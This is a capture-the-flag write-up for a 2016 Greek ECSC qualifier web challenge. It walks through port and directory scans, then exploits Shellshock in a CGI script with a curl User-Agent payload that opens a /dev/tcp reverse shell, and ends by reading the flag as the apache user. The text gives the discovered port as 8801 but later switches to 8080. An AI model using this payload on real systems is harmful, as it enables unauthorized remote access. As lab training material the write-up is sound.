Category: Web security

You can download the Web Security Challenge, along with all the challenges for the 2016 Greek Qualifier CTF of European Cybersecurity Challenge, in this link. More details on the Greek ECSC 2016 Qualifier CTF event can be found here.

Points: 60

Challenge designer: nasosnik

Description: > Obtain a command shell on the remote host as apache user.


First we scan the host and discover two HTTP services running on ports 80 and 8801.

root@kali:~# nmap -sT -Pn -p1-65535

Starting Nmap 6.49BETA4 ( ) at 2016-07-09 10:42 EEST
Nmap scan report for
Host is up (0.0017s latency).
Not shown: 65533 closed ports
80/tcp   open  http
8801/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 3.78 seconds

On port 80 there was a WordPress blog. However, after some experimentation it didn’t seem to be our entry point. So, we switched our attention on port 8080. Starting with a directory scan we found an accessible CGI script (/cgi-bin/debug).

root@kali:~# dirb -r -f -N 404

DIRB v2.22
By The Dark Raver

START_TIME: Tue Aug 30 08:13:58 2016
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Ignoring NOT_FOUND code -> 404
OPTION: Not Recursive



---- Scanning URL: ----
+ (CODE:200|SIZE:45)

END_TIME: Tue Aug 30 08:14:01 2016

The target server was found vulnerable to Shellshock, a well-known bug publicly disclosed on 2014. We exploit Shellshock to get a reverse shell using the /dev/tcp device (nc was missing from the system).

root@kali:~# curl -H 'User-Agent: () { :;}; /bin/sh -i >& /dev/tcp/ 0>&1'
root@kali:~# nc -nvvlp 33444
Listening on [] (family 0, port 33444)
Connection from [] port 33444 [tcp/*] accepted (family 2, sport 39126)
sh: no job control in this shell
sh-4.1$ id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-4.1$ cat flag.txt

The flag is: > flag{You_Win_th1s_Time}

# echo 7eamnull

Share This

Share this post with your friends!